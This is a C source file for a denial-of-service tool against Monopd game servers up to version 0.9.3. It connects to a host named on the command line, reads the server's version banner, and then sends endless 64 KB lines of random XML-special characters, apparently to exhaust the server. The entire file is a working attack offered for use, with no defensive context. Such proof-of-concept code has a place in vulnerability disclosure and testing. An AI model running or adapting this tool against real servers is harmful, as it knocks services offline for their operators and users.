/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define ONESEC  1
#endif



#define VER         "0.1"
#define PORT        1234
#define BUFFSZ      65535   // this is a lot, 20000 is enough



int recv_xml(int sd, u_char *data, int size);
int create_rand_string(u_char *data, int len, u_int *seed);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u_int   seed;
    int     sd,
            i,
            len;
    u_short port = PORT;
    u_char  *buff;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    srand(time(NULL));
    setbuf(stdout, NULL);

    fputs("\n"
        "Monopd <= 0.9.3 DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("- connect...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf(" done\n");

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    printf("- receive version:\n");
    len = recv_xml(sd, buff, BUFFSZ);
    if(len < 0) goto quit;
    printf("  %s\n", buff);

    printf("- start DoS attack\n");
    seed = time(NULL);
    buff[0] = '.';  // .n, but also .pi is ok
    buff[1] = 'n';

    for(;;) {
        create_rand_string(buff + 2, BUFFSZ - 3, &seed);
        buff[BUFFSZ - 1] = '\n';
        if(send(sd, buff, BUFFSZ, 0) <= 0) break;

        for(i = 5; i >= 0; i--) {
            printf("%3d\r", i);
            sleep(ONESEC);
        }
    }

quit:
    close(sd);
    printf("- server has interrupted the connection\n");
    return(0);
}



int recv_xml(int sd, u_char *data, int size) {
    int     i;
    u_char  *p;

    p = data;
    size--;
    for(i = 0; i < size; i++) {
        if(recv(sd, p, 1, 0) <= 0) return(-1);
        p++;
        *p = 0;
        if(stristr(data, "</monopd>")) break;
    }
    return(i);
}



int create_rand_string(u_char *data, int len, u_int *seed) {
    u_int   rnd;
    u_char  *p = data;
    const static u_char table[] =
                "&"
                "<"
                ">"
                "\"";

    rnd = *seed;

    while(len--) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        rnd >>= 3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(p - data);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


